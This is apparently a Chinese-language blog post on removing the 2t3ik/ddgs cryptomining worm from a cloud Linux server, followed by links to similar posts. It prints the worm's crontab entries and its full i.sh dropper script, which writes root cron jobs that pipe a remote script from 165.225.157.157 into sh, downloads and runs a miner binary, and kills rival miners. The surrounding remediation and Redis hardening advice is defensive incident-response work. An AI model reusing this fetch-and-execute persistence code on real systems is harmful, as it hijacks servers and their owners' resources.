2t3ik与ddgs挖矿病毒处理
一、问题现象
朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。
2t3ik_worm
二、分析处理
即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:
*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddgs.3011" ]; then
curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。
删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:
cd /tmp/
rm -rf 2t3ik.p
rm -rf ddgs.3011
touch 2t3ik.p
touch ddgs.3011
chattr +i 2t3ik*
chattr +i ddgs*
三、产生原因
网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:
redis-cli -h 127.0.0.1 -p 6379
config get requirepass //获取当前密码
config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;
永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:
requirepass yourpassword //此处注意,行前不能有空格
另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。
2t3ik与ddgs挖矿病毒处理相关推荐
- 阿里云centos上处理2t3ik与ddgs病毒
阿里云centos上处理2t3ik与ddgs病毒 有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示 系 ...
- linux服务被植入挖矿(2t3ik与ddgs)解决方式
已处理过多台服务器,目前没再被植入挖矿,按照以下步骤可行: 1.安装杀毒软件ClamAV https://www.cnblogs.com/duoyi/articles/clamav.html 2.删除 ...
- 常见挖矿病毒处理方法(qW3xT/Ddgs.3011/S01wipefs/acpidtd/MSFC)
常见挖矿病毒处理方法 1.常见病毒 病毒名称:qW3xT: 现象:占用超高CPU,进程查杀之后自启动. 中毒案例:(--) 2.病毒名称:Ddgs.3011 现象:占用超高CPU,进程查杀之后自启动. ...
- 解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
- Linux 下qW3xT.2,解决挖矿病毒
早上开启电脑,连接服务器,使用top查看cpu状态.结果显示进程占用cpu99%以上. 在网上百度,了解到qW3xT.2是一个挖矿病毒.也就是说别人利用你的电脑挖矿.谋取利益. 解决办法: 1.首先解 ...
- qW3xT.2,解决挖矿病毒。
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置. 在晚上一点左右.阿里云给我发短信,告诉我服务器出现紧急安全事件.建议登录云盾-态势感知控制台查看详情和处理. 于 ...
- 阿里云服务器---排查挖矿病毒
1.背景 记录一次排查挖矿病毒的过程,其实都是按照阿里云官方教程操作,其中有些操作命令需要重点记录下,为后面生产环境做铺垫学习. 重要:经过近一个月的努力,最终还是放弃了,杀之不尽,大家就看看它长啥样 ...
- jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!
作者:SilentBillows,资深Java工程师,架构师小秘圈特约作者!欢迎大家投稿,在后台回复投稿即可! 一, 定位问题 1.发现cpu异常,查看对应的进程信息 [root@versionlib ...
- Linux——挖矿病毒(sysupdate, networkservice进程)清除解决方案
问题描述 Linux进程 阿里云管理控制台看看CPU占用率 解决方案 top命令 获取进程号 查看进程运行的文件位置 ls 命令 ls -l proc/{进程号}/exe sysupdate.netw ...
最新文章
- jdbctemplate oracle xml文件,Spring JDBCTemplate使用JNDI数据源
- python无参数装饰器_python_之无参装饰器_01
- 互联网的大数据神话——NoSQL
- no segments* file found in org.apache.lucene.store.SimpleFSDirectory
- C++ Semaphore信号量使用
- java 读取使用keytool生产的keystore文件
- Java中栈,堆,常量池的简单理解
- Excel 将换行符替换为空
- Spring Boot和Dubbo整合
- [转]技术路线的选择重要但不具有决定性
- CentOS 7下编译FreeSWITCH 1.6
- 容器技术Docker K8s 43 Serverless Kubernetes(ASK)详解-ASK网络、存储、日志、监控管理
- 漫网漫画APP源码包含后台完整版
- 第二章:JAVA编程基础
- OGRE关于 Demo_Ocean 例子的分析
- GTP编译报错,需要增加IBUF
- 一个屌丝程序猿的人生(六十三)
- Mac如何卸载系统自带软件?macbook系统软件怎么删除?
- Microsoft Azure 建立虚拟机
- 每日一题 第二次考试 数据库题目,7.17数据库面试题目补充